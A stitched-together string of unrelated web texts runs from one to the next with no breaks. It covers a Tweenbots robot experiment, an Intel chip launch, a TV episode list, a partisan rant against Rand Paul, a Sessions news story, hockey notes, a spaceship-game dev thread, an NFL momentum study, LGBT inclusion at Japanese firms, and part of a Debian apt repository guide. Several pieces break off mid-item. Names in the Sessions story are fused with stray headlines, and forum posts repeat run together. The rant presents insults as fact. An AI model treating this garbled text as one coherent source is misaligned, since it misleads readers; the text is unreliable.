Over the course of the following months , throughout numerous missions , the Tweenbots were successful in rolling from their start point to their far-away destination assisted only by strangers . Every time the robot got caught under a park bench , ground futilely against a curb , or became trapped in a pothole , some passerby would always rescue it and send it toward its goal . Never once was a Tweenbot lost or damaged . Often , people would ignore the instructions to aim the Tweenbot in the “ right ” direction , if that direction meant sending the robot into a perilous situation . One man turned the robot back in the direction from which it had just come , saying out loud to the Tweenbot , “ You ca n't go that way , it 's toward the road . ”
So why do people help out the tweenbot ? Personally I would not be able to resist assisting the anthropomorphized little robot . The smile signals its innocent intentions and the Tweenbot 's label makes it clear how to help . It 's something for designers and technologists to remember ; sometimes cute and clever can get the job done much cheaper and in less time than smart and expensive .
There are more Tweenbots coming so if you happen to see any friendly robots around your town lend a hand . Here are some of the prototypes that are currently in development .
via Hacker News
Intel 's response to AMD 's disruptive Ryzen processors is soon to get its time in the sun . Well , sort of . On Tuesday , Intel announced plans to livestream the launch of its 8th-generation ( presumably “ Coffee Lake ” ) processors on August 21—the same day that the great American solar eclipse casts its shadow across the United States . Intel 's throwing shade .
Eighth-gen Coffee Lake chips will be built using a revised version of Intel 's 14nm process technology for an unprecedented fourth time , following in the footsteps of Broadwell , Skylake , and Kaby Lake architectures . You 'll probably also need a new motherboard to use them . But most notably , Intel claims 8th-gen Core chips will be up to 30 percent faster than today 's Kaby Lake processors in some applications . Intel chips have n't seen a performance leap like that in years .
Beyond that , little is officially known about Coffee Lake , though the churning internet rumor mill thinks that Intel will up the core counts this time around to combat the threat of Ryzen . We 've heard rumors of six-core chips and quad-core Core i3 chips finally cracking into Intel 's mainstream lineup , which the Full Nerd crew discusses in-depth in the video below . If those whispers wind up being true , it could help explain Intel 's expectations for such a lofty performance jump , as ramping up the core count could quickly improve Coffee Lake 's performance in thread-sensitive tasks .
You 'll be able to watch the reveal of the 8th-gen Core processors on Intel 's Facebook page or internal newsroom at 11 a.m. Eastern/8 a.m. Pacific on August 21 . Gregory Bryant , senior vice president of the Client Computing Group , will discuss performance and details about the chips , which Intel says will be available in devices “ in the holiday season and even before . ”
It 's going to be a busy week for Intel . A mere seven days later , on August 28 , the company 's first 12-core Core i9 chip launches to battle AMD 's high-end Threadripper CPUs , which hit the streets on August 10 . Competition is a wonderful thing for consumers .
Episode # Title Directed by Original air date US Viewers ( millions )
1 `` Are Black Holes Real ? '' TBA January 9 , 2018 ( ) .375 [ 11 ]
New discoveries are challenging everything we know about black holes -- astronomers are beginning to question if they even exist . The latest science tries to explain how they work & what they look like , despite the fact we 've never actually seen one .
2 `` Twin Suns : The Alien Mysteries '' TBA January 16 , 2018 ( ) .385 [ 12 ]
Planets that orbit two suns instead of one might be deadly hell worlds , but new discoveries reveal that sci-fi star systems with binary stars might be optimal places for alien life .
3 `` Dark History of the Solar System '' TBA January 23 , 2018 ( ) .347 [ 13 ]
New discoveries reveal that Earth and the planets were formed from the destruction of strange alien worlds .
4 `` Death of the Milky Way '' TBA January 30 , 2018 ( ) .341 [ 14 ]
The Milky Way is dying , and experts are investigating what 's killing it .
5 `` Uranus & Neptune : Rise of the Ice Giants '' Mark Bridge February 6 , 2018 ( ) .378 [ 15 ]
Uranus and Neptune are mysterious , icy worlds at the edge of our solar system , and new discoveries reveal that these strange planets might have helped start life on Earth .
6 `` Secret History of Mercury '' TBA February 13 , 2018 ( ) .346 [ 16 ]
Mercury is a deadly world , facing attacks from the Sun , comets , and other planets , and even though it 's the smallest planet in our solar system , it has a dangerous secret that might one day threaten life on Earth .
7 `` The Quasar Enigma '' TBA February 20 , 2018 ( ) .371 [ 17 ]
Quasars are the brightest and most powerful objects in our universe , and though they have shaped the cosmos , they might ultimately destroy everything that exists .
8 `` Strange Lives of Dwarf Planets '' TBA February 27 , 2018 ( ) .302 [ 18 ]
Our solar system is home to hundreds of strange , tiny worlds called dwarf planets , and new discoveries reveal the secrets of these mysterious places .
9 `` War on Asteroids '' TBA March 6 , 2018 ( ) .333 [ 19 ]
Scientists are using cutting-edge technology to stop an asteroid apocalypse , and for the first time , mankind is closer than ever to keeping Earth safe from these killer space rocks .
10 `` Mystery of Spacetime '' TBA March 13 , 2018 ( ) .395 [ 20 ]
Confession : If I could have reached through the monitor and slapped Rand Paul , I would have . Since I could n't do it in real life , I 'm going to do it virtually .
All day long , Fox News has been slamming the enrollment numbers announced by the Obama administration . Rand Paul 's appearance was just icing on the ignorance cake .
Highlights :
The false claim that the 7.1 million enrollees include 80 percent either receiving subsidies or getting their health care `` free '' via Medicaid . Of course , people paying attention know the 7.1 million number does not include Medicaid recipients . I 've already ranted about the `` moocher '' claim , so I wo n't do too much of it again , except to ask whether or not Senator Paul views medical bankruptcies due to health care costs as mooching , too . The ignorant and false claim that increased numbers of beneficiaries on Medicaid will bankrupt hospitals . In fact , the opposite is true . The bizarre and random descent into speculation about how giving people access to affordable health care will cause currency devaluation and inflation . Concern trolling over the fates of poor people who will stay poor because they have health care which will destroy the value of the dollar . The false assertion that the `` bill will come due . '' Unlike Republicans , Democrats built `` pay-fors '' into the ACA along with provisions to push health care costs down . We waited four years past the law 's passage to accumulate the funds to pay for the subsidies and Medicaid costs .
This confirms everything we know about Senator Paul 's TeaBircher ways : He truly does believe that poor people should die , because then there would be more for everyone else .
If Senator Paul is so aggravated about federal subsidies and Medicaid recipients , perhaps he should embrace an increase to the minimum wage . That would lift all boats , decrease the number of people earning below the poverty line , and enable people to climb out of poverty while staying healthy at the same time . Of course , that would also mean less Billionaire Bucks in the pockets of Mr. Paul 's owners .
Also , an aside to Fox News : Displaying March 1st statistics on young people 's enrollments is intentionally misleading . We know you do n't really give a damn about facts , nor do your viewers , but that was laughable .
A pair of Senate Democrats are demanding Attorney General Jeff Sessions Jefferson ( Jeff ) Beauregard SessionsTrump says he has n't spoken to Barr about Mueller report Ex-Trump aide : Ca n't imagine Mueller not giving House a ‘ roadmap ' to impeachment Rosenstein : My time at DOJ is 'coming to an end ' MORE testify before the Senate Judiciary Committee after court documents revealed a Trump campaign staffer offered to set up a meeting between Moscow and then-candidate Donald Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe : report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort 's attorneys say he should get less than 10 years in prison MORE .
Democratic Sens . Richard Blumenthal ( Conn. ) and Patrick Leahy Patrick Joseph LeahySenate plots to avoid fall shutdown brawl Booker wins 2020 endorsement of every New Jersey Democrat in Congress The Hill 's Morning Report - Can Bernie recapture 2016 magic ? MORE ( Vt. ) want to know why Sessions , at the time an Alabama senator , did not previously disclose a March 2016 meeting where George Papadopoulos , a former campaign adviser , offered to use his contacts to set up a meeting between Trump and Russian President Vladimir Putin .
`` He now needs to come back before the Committee , in person , under oath , to explain why he can not seem to provide truthful , complete answers to these important and relevant questions , '' Leahy , a former chairman of the Judiciary Committee , said in a statement .
ADVERTISEMENT
Blumenthal added in a separate letter to Sessions that he should `` immediately come before the Senate Judiciary Committee to update your testimony and correct any omissions and any statements that may have been incorrect or misleading . ''
Blumenthal is also asking him to submit in writing whether he knew at the time of his confirmation hearing about `` any communications between individuals affiliated in any way with the Trump campaign and Russian government officials or agents . ''
Sessions previously told lawmakers that he did not know of any contacts between Russian officials and Trump campaign surrogates .
But Papadopoulos , who pleaded guilty to making false statement to federal investigators , said during a March 31 , 2016 , national security meeting `` that he had connections that could help arrange a meeting between then-candidate Trump and President Putin , '' according to a plea deal released on Monday as part of special counsel Robert Mueller 's probe into Russia 's election interference .
Sessions attended that meeting and a source told The Washington Post that Papadopoulos 's proposal was `` immediately rejected by then-Senator Sessions . ''
This week 's twist in the Mueller investigation is n't the first time Sessions has faced pressure from Democrats to clarify his previous testimony .
Sessions recused himself from the Russia investigation earlier this year amid reports that he failed to disclose two 2016 meetings with Russia 's ambassador .
Sen. Al Franken Alan ( Al ) Stuart FrankenVirginia can be better than this Harris off to the best start among Dems in race , say strategists , donors Virginia scandals pit Democrats against themselves and their message MORE ( D-Minn. ) , who questioned Sessions during his confirmation hearing about any contact with Russian officials , also sent Sessions a letter on Thursday demanding that he detail his interactions with Papadopoulos .
`` This is another example in an alarming pattern in which you , the nation 's top law enforcement officer , apparently failed to tell the truth , under oath , about the Trump team 's contacts with agents of Russia—a hostile foreign power that interfered in the 2016 election , '' Franken wrote in the letter .
Franken is asking for details on the March 31 meeting and an earlier email from Papadopoulos to members of Trump 's foreign policy team that notified them of his talks about trying to set up a meeting between the campaign and Russian officials .
He also wants Sessions to explain his previous comments to lawmakers that he did n't meet with Russian officials and that he was n't aware of talks between Trump surrogates and Russian officials .
Prospect Dylan Strome has been named the Ontario Hockey League 's Player of the Month for November after he notched 10 goals and 21 assists in 12 games last month .
Playing for Erie , Strome had points in 11 of 12 games and nine multi-point games , including two five-point games on Nov. 6 against Peterborough and Nov. 28 against Sault Ste . Marie . In addition , Strome , a center , won 67 percent of his face-offs in November .
Strome , whom the Coyotes drafted third overall this year , ranks second in the OHL in points ( 51 ) with 16 goals and 35 assists in 23 games . That 's just two points behind teammate Alex DeBrincat .
On Tuesday , Strome and fellow Coyotes prospects Brendan Perlini and Nick Merkley were invited to Hockey Canada 's National Junior Team Selection Camp that begins Dec. 10 in Toronto .
• Captain Shane Doan and forward Steve Downie , who are nursing injuries , practiced with teammates on Wednesday at Joe Louis Arena as the team prepared for its game vs. the Red Wings on Thursday .
Both are close to returning to the lineup .
“ We 'll revisit it again in the morning but there 's a chance at least one of them will play , ” Head Coach Dave Tippett said .
Downie , who has missed 10 games because of an upper-body injury , is the more likely of the two players to be ready to play Thursday .
“ I think he 's eager to get back and eager to help , ” Tippett said . “ Hopefully he 'll get in there and give us a spark . ”
Doan has missed the past four games with a nagging lower-body injury and may need more time to heal .
“ He 's a big part of our team so whenever you 're missing a guy like him it 's tough , ” forward Jordan Martinook said . “ Obviously we 're hoping he 's back soon , but for the time being we 've just got to deal with it and try and play without him . ”
Doan has notched 374 goals , the second most by a player in Coyotes/Jets history . He trails leader Dale Hawerchuk by five goals .
• The Coyotes were out-shot , 41-15 , vs. Nashville on Tuesday in the first game of a five-game road trip .
“ When you only get 15 shots you would think your offense is poor but to me all that means is you defended way too much , ” Tippett said . “ ( It means ) you never had the puck and your defending did n't allow you to create offense . Offense will come when you work hard and check hard and recover the puck . If you never have the puck , you can be the most talented team in the world and you 're not going to get many chances . ”
Forward Kyle Chipchura said the Coyotes need to get back to playing with greater speed in order to increase offensive production .
“ We 're not playing as fast as we have in the past , ” Chipchura said . “ We 're not playing with that kind of jump and energy . ”
Faerdan
Level 0 UNION Spaceship Command [ Now on Greenlight ] « on : June 12 , 2015 , 01:45:24 AM »
About UNION Spaceship Command
Click here to see the latest pre-alpha video on YouTube , showing turret beam weapons , shields and ship destruction .
UNION Spaceship Command is a cooperative spaceship simulator in which two or more players work together to command a spaceship . Each player on the ship takes on one or more roles ( currently Captain , Helm , Tactical and Science/Coms ) . It is inspired by the concept of Artemis Spaceship Bridge Simulator , but this is a very different game . UNION is very much focused on simulation , having systems which are deep but which are also accessible ( the goal is easy to pick up , difficult to master ) . The entire game is simulated , from the physics used for ( 3D ) space flight to power , heat and sensors .
I 'll be covering the features of UNION in more detail over the coming weeks .
Clicking an image below will open a full size version .
About Development
I have been working on UNION on and off in my spare time over the past three years . It has undergone a few restarts in that time , as I learnt more about the networking and architecture requirements of a game of this type . My belief in the game has not diminished though , and I believe that I have enough momentum now , and am far enough along , to see the game through .
A big breakthrough for me in UNION was re-building the game using a data focused entity component system , it has made so many things fall into place rather easily .
I have all of the networking framework done with large scale entity/object replication , dynamic movement ( with prediction and interpolation ) based on physics , flight , prototyped power and heat simulation , shields , a working prototype of the engineering UI , and a work in progress prototype of the tactical UI .
Performance and stability , both in terms of general/rendering performance and networking ( particularly over the internet ) are hugely important to me . The game performs really well over the internet and it is very stable .
I will be doing a video dev log soon , but here is a short video clip of a multiplayer flight test I did yesterday , showing multiplayer flight with physics ( every object on the map , including asteroids , are dynamic with mass ) :
UNION Spaceship Command is a cooperative spaceship simulator in which two or more players work together to command a spaceship . Each player on the ship takes on one or more roles ( currently Captain , Helm , Tactical and Science/Coms ) . It is inspired by the concept of Artemis Spaceship Bridge Simulator , but this is a very different game . UNION is very much focused on simulation , having systems which are deep but which are also accessible ( the goal is easy to pick up , difficult to master ) . The entire game is simulated , from the physics used for ( 3D ) space flight to power , heat and sensors.I 'll be covering the features of UNION in more detail over the coming weeks.Clicking an image below will open a full size version.I have been working on UNION on and off in my spare time over the past three years . It has undergone a few restarts in that time , as I learnt more about the networking and architecture requirements of a game of this type . My belief in the game has not diminished though , and I believe that I have enough momentum now , and am far enough along , to see the game through.A big breakthrough for me in UNION was re-building the game using a data focused entity component system , it has made so many things fall into place rather easily.I have all of the networking framework done with large scale entity/object replication , dynamic movement ( with prediction and interpolation ) based on physics , flight , prototyped power and heat simulation , shields , a working prototype of the engineering UI , and a work in progress prototype of the tactical UI.Performance and stability , both in terms of general/rendering performance and networking ( particularly over the internet ) are hugely important to me . The game performs really well over the internet and it is very stable.I will be doing a video dev log soon , but here is a short video clip of a multiplayer flight test I did yesterday , showing multiplayer flight with physics ( every object on the map , including asteroids , are dynamic with mass ) : « Last Edit : July 10 , 2015 , 07:06:36 AM by Faerdan » Logged UNION Spaceship Command [ Greenlight | IndieDB | Twitter ] Developer of
Faerdan
Level 0 Re : UNION Spaceship Command « Reply # 1 on : June 12 , 2015 , 12:02:31 PM » The Engineering Station
The engineering station is the beating heart of a ship in UNION . The power , heat and damage it manages affects every other station on the ship . I also really felt like it needed to make a statement about what UNION is .
I started with the idea of having each system on the ship shown as a widget floating in it 's position on a holographic version on the ship . I did up some mock widgets ( shown above ) but they were pretty uninspiring and it did n't feel like they would lead to a good UI .
So I went back to the drawing board . An idea I played with a lot was to have a pipes style setup , where you have to route power around the ship by placing and rotating pipe-like connections . It was too complicated and finicky though , so I started thinking about doing connections in a different way . That led me to the idea of arranging the systems of a ship in a circle , with the power core in the centre . The power core would have output nodes which can be connected to input nodes on the systems . You can only connect output nodes to input nodes if you can reach them ( a connection line can not cross the core or other nodes ) . The first picture shows the ship in a standard configuration , the second shows a `` Cruise '' config to power the energy-hungry cruise engines . The only other things powered in this config are short and long range sensors .
I felt really energised by this `` power wheel '' , and began to add more information while refining the design . I added power charge , heat and coolant displays to each system . I also added the idea of having an upper limit to the amount of power each node can output . If a node is outputting too much power , it becomes unstable . Unstable nodes can explode when the ship takes damage or if too much heat is generated across the systems . Finally I added head and power displays to the outside of the wheel . The heat and energy output of your ship combine to create your energy signiture . The higher your heat signature the easier you are to detect ( especially at longer distances ) and the more accurate any locks on you will be .
Here is a rather large image showing different configuration examples .
And here it is built into a full UI . The large buttons on the left allow you to create and use your own configs , along with the un-changable Standard and Cruise configs . Clicking on a system in the wheel displays that system in more detail on the top left , allowing you to tweak any components/weapons which are attached to the system .
I am going to do a video dev log soon which shows the multiplayer flight , physics and shields . After that I intent to work on turrets with targetting and firing .
I had built my UIs to use Scaleform , but it does not currently support Unity 5 . It seems like I may need to rebuild them using Unity 's own GUI system .
Thanks for reading ! The engineering station is the beating heart of a ship in UNION . The power , heat and damage it manages affects every other station on the ship . I also really felt like it needed to make a statement about what UNION is.I started with the idea of having each system on the ship shown as a widget floating in it 's position on a holographic version on the ship . I did up some mock widgets ( shown above ) but they were pretty uninspiring and it did n't feel like they would lead to a good UI.So I went back to the drawing board . An idea I played with a lot was to have a pipes style setup , where you have to route power around the ship by placing and rotating pipe-like connections . It was too complicated and finicky though , so I started thinking about doing connections in a different way . That led me to the idea of arranging the systems of a ship in a circle , with the power core in the centre . The power core would have output nodes which can be connected to input nodes on the systems . You can only connect output nodes to input nodes if you can reach them ( a connection line can not cross the core or other nodes ) . The first picture shows the ship in a standard configuration , the second shows a `` Cruise '' config to power the energy-hungry cruise engines . The only other things powered in this config are short and long range sensors.I felt really energised by this `` power wheel '' , and began to add more information while refining the design . I added power charge , heat and coolant displays to each system . I also added the idea of having an upper limit to the amount of power each node can output . If a node is outputting too much power , it becomes unstable . Unstable nodes can explode when the ship takes damage or if too much heat is generated across the systems . Finally I added head and power displays to the outside of the wheel . The heat and energy output of your ship combine to create your energy signiture . The higher your heat signature the easier you are to detect ( especially at longer distances ) and the more accurate any locks on you will be.Here is a rather large image showing different configuration examples.And here it is built into a full UI . The large buttons on the left allow you to create and use your own configs , along with the un-changable Standard and Cruise configs . Clicking on a system in the wheel displays that system in more detail on the top left , allowing you to tweak any components/weapons which are attached to the system.I am going to do a video dev log soon which shows the multiplayer flight , physics and shields . After that I intent to work on turrets with targetting and firing.I had built my UIs to use Scaleform , but it does not currently support Unity 5 . It seems like I may need to rebuild them using Unity 's own GUI system.Thanks for reading ! « Last Edit : June 18 , 2015 , 11:06:35 AM by Faerdan » Logged UNION Spaceship Command [ Greenlight | IndieDB | Twitter ] Developer of
Faerdan
Level 0 Re : UNION Spaceship Command « Reply # 2 on : June 18 , 2015 , 08:39:16 AM »
You can click the image to see it in full resolution .
Not a full devlog , but I just took the first screenshot of ship-on-ship action ( with turrets , laser beams and shields working together in multiplayer ) and really had to share . I will produce a video dev log soon showing everything in action soon ( flat out developing at the moment ) .You can click the image to see it in full resolution . « Last Edit : June 18 , 2015 , 11:06:48 AM by Faerdan » Logged UNION Spaceship Command [ Greenlight | IndieDB | Twitter ] Developer of
Faerdan
Level 0 UNION Spaceship Command [ Dev Log 5 - now with video ] « Reply # 3 on : June 26 , 2015 , 02:41:26 PM » My Recent Progress , And A New Video
A rock solid simulation , and the creation of a believable reality , are very important elements of UNION development . For this reason I have been focusing heavily on multiplayer flight , physics , turrets , ( beam ) weapons , shields , and destruction . And I finally have something to show for it in this video :
Turrets
Turrets are fully simulated on the server , finding targets ( or at least attempting to up to the edge of their firing arcs ) with their own rotation speed . These turret rotations are are then synchronised on the player clients so that they can see the the turrets as they currently are . As with all of the networking code this functionality has been designed to work well over the internet ( using a variety of techniques to minimise the bandwidth requirements ) .
Firing Laser Beams
Turrets are grouped into weapon groups which can be targeted and fired independently . Turrets will only fire when they have the target in their sights . Shields however do not block line of sight , so it is possible for a target to hide behind another ship's/station 's shields ( or for you to accidentally hit the shields of another ship ) .
Beams do damage based on their strength and how long they fire for . These variables can be tweaked by the Engineer . The more energy a weapon uses , and the length it uses it for , affects how much heat that weapon generates .
Shields
Shields absorb energy from weapon hits , depending on the current strength of the shields . If all of the weapon 's energy is n't absorbed there will be some penetration to the hull .
Structural Integrity And Destruction
A target 's hull absorbs the energy from any hits , removing or reducing any damage to internal systems . This absorbed energy damages the ship 's structural integrity . If that integrity drops low enough the ship will explode .
That 's it for now . I would love to hear your comments and suggestions .
- Faerdan A rock solid simulation , and the creation of a believable reality , are very important elements of UNION development . For this reason I have been focusing heavily on multiplayer flight , physics , turrets , ( beam ) weapons , shields , and destruction . And I finally have something to show for it in this video : Turrets are fully simulated on the server , finding targets ( or at least attempting to up to the edge of their firing arcs ) with their own rotation speed . These turret rotations are are then synchronised on the player clients so that they can see the the turrets as they currently are . As with all of the networking code this functionality has been designed to work well over the internet ( using a variety of techniques to minimise the bandwidth requirements ) .Turrets are grouped into weapon groups which can be targeted and fired independently . Turrets will only fire when they have the target in their sights . Shields however do not block line of sight , so it is possible for a target to hide behind another ship's/station 's shields ( or for you to accidentally hit the shields of another ship ) .Beams do damage based on their strength and how long they fire for . These variables can be tweaked by the Engineer . The more energy a weapon uses , and the length it uses it for , affects how much heat that weapon generates.Shields absorb energy from weapon hits , depending on the current strength of the shields . If all of the weapon 's energy is n't absorbed there will be some penetration to the hull.A target 's hull absorbs the energy from any hits , removing or reducing any damage to internal systems . This absorbed energy damages the ship 's structural integrity . If that integrity drops low enough the ship will explode.That 's it for now . I would love to hear your comments and suggestions.- Faerdan Logged UNION Spaceship Command [ Greenlight | IndieDB | Twitter ] Developer of
Charles Godfrey of the Carolina Panthers anticipated the play perfectly .
As New Orleans Saints quarterback Drew Brees rolled to his right and threw the ball to tight end David Thomas , Godfrey sliced in front of Thomas , snatched the ball out of the air and strolled nine yards for a touchdown . The Panthers bench erupted . The crowd went nuts . And sportswriters breathlessly proclaimed the first-quarter play in Sunday 's game a turning point where the momentum shifted decisively in favor of the Panthers , who won 35-27 .
Except it did n't .
The widely held and devoutly believed idea that a big play can change the momentum of a game is , in a word , bunk . So say a trio of MIT stats geeks with a decade of data to back them up .
Aaron Johnson , Alex Stimpson , and Torin Clark analyzed 473,621 plays run during the 2,931 NFL games played between 2000 and 2010 simply to determine whether big plays change the momentum of a game , motivating teams to perform better in subsequent drives . The results , presented in Turning the Tide : Big Plays and Psychological Momentum in the NFL ( .pdf ) , found no evidence that a big defensive play has any effect on offensive performance later in the game .
That flies in the face of all that sports writers and armchair quarterbacks will tell you . Like many football fans , Johnson and his friends believed the conventional wisdom , but being engineers , they 're skeptical of everything until they 've seen the data . So they decided to test it .
They gleaned stats from ArmchairAnalysis.com to examine 69,330 drives , which they divided into two categories : those that started after a big defensive play — an interception , fumble recovery , fourth-down stop , safety , or blocked kick — and those that did not . Then they analyzed three variables : the result of the first play after the change of possession , the success of the first set of downs , and the points scored on that drive . They discovered that a big defensive play does n't improve the performance of the offense on the subsequent drive .
In other words , the momentum does n't shift .
The key reason lies in something called the momentum chain , defined by scholars Jim Taylor and Andrew Demick in 1994 . For a precipitating event to have an effect on performance , they found , a number of factors and internal attitudes must align perfectly . In Sunday 's game , for example , the Panthers ' offense would have had to gain positive momentum after Godfrey 's interception and the Saints defense would have to see negative momentum . That 's not what happened : Godfrey 's pick-six tied the game at 7-7 , but New Orleans bounced back with a pair of field goals to take a 13-7 lead before Carolina came back to take the lead for good .
So if the momentum does n't actually change , why do we think it does ?
`` People do this with a lot of psychological phenomena that do n't actually exist , '' Johnson said . `` Fans watch the games , and we associate the positive outcomes with a particular perceived phenomenon and we fail to associate the negative ones with our phenomena . So if a team scores a touchdown right after they intercept the ball , we say that the touchdown happened because of the interception . We take that causal leap . And these are the situations we all remember instead of all the 3-and-outs that happen after interceptions . ''
Dr. Robert Corb , a sports psychologist on the UCLA athletics medical staff , said it 's the sports version of the placebo effect : If you believe something will work , it often does .
`` We know from social learning theory that people learn from watching others , '' Corb said . `` If the offense sitting on the sidelines watches their defense get pumped up after making a big play , those offensive players are likely to get pumped up as well , and perhaps go out and make a big play themselves . If that happens a few times , and coaches and announcers start talking about a change in momentum , perception becomes reality . ''
After their paper was published for the MIT Sloan Sports Analytics Conference earlier this year , the students expanded their research to examine whether coaches are significantly riskier after big defensive plays or turnovers . Do they `` go for the kill '' after the defense turns in a big play ? Again , the answer was no . There was no evidence to suggest their plays grew more aggressive to take advantage of the big play .
For their next move , Johnson , Stimpson , and Clark hope to expand their research into college football to see whether younger players are more influenced by psychological factors . For now , though , they have plenty of opportunities each week to add to their NFL data .
`` Now we pay more attention to when the commentators talk about momentum , which seems to be all the time , '' Stimpson said . `` We also tend to point it out to our friends , which has probably become annoying by this point . ''
In May 2015 , Hiroki Inaba , vice president of Goldman Sachs Japan Co. 's legal department , came out as gay , after almost 13 years with the company and 10 years since the company established its LGBT Network , which was formed by staff to promote understanding of sexual minorities .
Although Goldman Sachs Japan has systems in place to provide training to its employees on diversity and inclusion , Inaba said it was also really the support of his boss , Naosuke Fujita , that encouraged him to come out .
“ I came out to thank Fujita for all the efforts he had made , ” Inaba said .
In a sign of slowly change attitudes , companies in Japan are taking gradual steps to eliminate discrimination against employees , including lesbian , gay , bisexual and transgender people .
While there are still no national laws that accord equal rights to same-sex couples , Goldman Sachs Japan provides employees the same benefits to LGBT partnerships as with married couples . The firm also places a senior manager in each division who takes the lead in promoting diversity .
Fujita was one such leader for the legal department , encouraging staff attendance of LGBT-related events while also raising awareness against discriminatory language .
He agonized over many concerns , including how best to protect people from injurious or pejorative language , Fujita said .
Fujita consulted with an openly gay co-representative of the company 's LGBT Network sometime in 2011 to discuss his concerns .
“ What that person advised me to do was to simply state that I was an ally , and that 's all I needed to do , ” Fujita said .
Since then , Fujita placed a sign on his desk and a flag in his office clearly demonstrating his stand as an LGBT ally . He wrapped his phone in stickers labeled “ Lesbian , Gay , Bisexual and Transgender Network. ” He had also created opportunities in the workplace to discuss types of discrimination against LGBT people .
“ I did n't think the steps I took were big enough to allow Inaba to come out . But it surprised me that it had such an impact , ” Fujita said .
Since Inaba came out , Fujita decided to broaden his efforts to change not only the work environment , but also society in general .
Fujita and Inaba launched a private organization in February 2016 called Lawyers for LGBT & Allies Network , aimed at promoting understanding of sexual minorities , eliminating discrimination and helping create a more inclusive society .
“ The main focus of our organization , which will soon become an NPO , is freedom of marriage . Our view is that heterosexuals have access to the system of marriage set by the civil code , but why should this be inaccessible to people with different sexual orientations or gender identities ? ” Fujita said .
In the past few years , municipalities have taken steps to recognize same-sex marriages .
Tokyo 's Shibuya Ward passed an ordinance in 2015 and agreed to issue legally nonbinding certificates that declared same-sex partnerships “ equivalent to marriage. ” The document allows gay couples to be treated on par with married couples for hospital visits and apartment rentals . Other cities , including Naha in Okinawa and Iga in Mie Prefecture have since established similar programs , and most recently on June 1 , Sapporo started a similar certification program .
But to date , there is no legal backing for same-sex marriages , as Article 24 of the Constitution states that marriage “ shall be based only on the mutual consent of both sexes . ”
To help raise awareness , Lawyers for LGBT & Allies Network has published various influential documents , including “ Foreign Law Report On Equal Marriage , ” which explains about the legal background of how same-sex marriages were approved in other countries , such as the United States , Canada and New Zealand .
In April , both Fujita and Inaba were given the “ Outstanding International Corporate Counsel Award ” by the American Bar Association for “ their positions to initiate and sustain changes for the advancement of the rule of law and the rights of lesbian , gay , bisexual , and transgender ( LGBT ) people in Japan merits recognition . ”
Now co-heading the company 's LGBT Network , Inaba leads a team of about 190 members to make the workplace a better environment for LGBT employees .
He also runs the firm 's information sessions directed to LGBT students . Held annually since 2009 , the session was attended by about 50 students this year , according to Inaba .
Similar efforts to eliminate discrimination have started to take place at firms in Japan .
IBM Japan Ltd. has been promoting LGBT understanding in the company since 2004 . It now offers seminars to employees and provides family benefits to same-sex couples .
On top of changes in the workplace , the company also shares best practices with other firms .
In 2012 , IBM Japan co-founded an organization called Work With Pride along with NGO Human Rights Watch , and nonprofit Good Aging Yells . The organization started its activities by providing seminars targeting human resources employees at other firms .
Megumi Umeda , a human resources manager at IBM Japan , said the decision was made after receiving public input that the company was well positioned to make progress for LGBT employees because it was a foreign firm .
“ I thought it was necessary to make domestic companies take action in order to change society as a whole , ” Umeda said , adding that electronics giants such as Sony Corp. and Panasonic Corp. were one of the first Japanese firm to sign on and cooperate with Work With Pride .
In 2016 , Work With Pride published guidelines for companies and other organizations , such as schools , to follow in improving their environment for LGBT people . It awards organizations that made outstanding efforts , under gold , silver and bronze prizes .
Gon Matsunaka , the founder of Good Aging Yells , explained that the guidelines were made after being contacted by human resources managers of Japanese firms who “ wanted detailed examples of practices ” that the company should be conducting .
“ They also wanted to make it an opportunity to move the top ” of the organizations , said Matsunaka , adding that awarding a prize is an effective way to motivate firms .
The guidelines point to measures such as if a firm is providing staff with enough training sessions , if consultation is available and if an LGBT employee is awarded with necessary benefits . It also finds it important that a firm consider restrooms or changing rooms that could be used by all people regardless of gender .
In 2016 , the award accepted entries from more than 82 organizations nationwide , and is expecting more this year . Entries are now accepted until Sept. 15 .
“ It 's a way of sharing the practice , ” said Matsunaka .
“ Diversity and inclusion are management resources and tactics that could be kept within the company , but bring more benefits if they are shared ” by other organizations , he said .
Setting up a personal secure apt repository
Posted by wijnen on Sun 24 May 2015 at 09:58
Packages under development are n't always ready to be in the main Debian archive . But that does n't mean it should be hard for people to install them . When asking people to test programs , it is most convenient to present it in the way they are expecting : as a package . For this , a personal repository is useful . The tools for doing this are available in Debian , but the method is not well documented . This article attempts to do that .
Note that this article describes my setup only . In several cases , this is not the only good way to do it . But if you do n't want to spend much time finding out what works , copying this setup may be a good idea . The host this is on is wijnen.dtdns.net . My username there is shevek . Replace those values with your own in the examples below .
Requirements
The packages must be as easy to install as official packages . That means adding a single line to /etc/apt/sources.list and nothing more . For this , the mini-dinstall package can be used . However , a signing key needs to be set up to avoid warnings about untrusted packages . Both these things are discussed below .
Apache
All this must run on a computer with a web server . I have Apache installed on my computer . My computer is behind a masquerading router ( also called NAT ) . I have set up the router to forward http packets to my computer . How to do that depends on your router , and is outside the scope of this article .
All the files ( except the private key ) are stored in my home , under public_html/archive/ . That way , everyone can read the source in http : //wijnen.dtdns.net/~shevek/archive/ , which is nice .
In /var/www/html/ , I have added a symbolic link to /home/shevek/public_html/archive/ , which makes the repository available in http : //wijnen.dtdns.net/archive/ .
Mini-dinstall
I 'm running mini-dinstall from /home/shevek/public_html/archive as
mini-dinstall -- config config -- batch
The config file that is referenced there is /home/shevek/public_html/archive/config and it contains :
[ DEFAULT ] archivedir=/home/shevek/public_html/archive archive_style=simple-subdir architectures=all , amd64 generate_release=1 mail_on_success=0 release_signscript=/home/shevek/public_html/archive/sign [ stable ] release_codename=wheezy [ unstable ] release_codename=sid
Then sometimes files are referenced by suite ( unstable ) and sometimes by codename ( sid ) . Therefore , both names must exist and be a directory . More specifically , both must be the same directory . So make directories and link them :
$ mkdir sid $ mkdir wheezy $ ln -s sid unstable $ ln -s wheezy stable
Using the codename as the real directory and the suite as the link makes it more clear what happens on release : the stable link is moved from wheezy to jessie ( which I do n't build for ) , while the packages in wheezy and jessie do n't change .
An incoming directory is also required by mini-dinstall . That 's where packages must be dropped to get them installed into the archive :
$ mkdir -p mini-dinstall/incoming
That 's all for mini-dinstall . However , because it is set up to sign the release files , it does n't work until that is set up as well .
Secure APT
To use signed repositories , I need a key to sign with . I want this to be without hassle , so without entering a passphrase . So I need to create a new key :
$ gpg -- gen-key
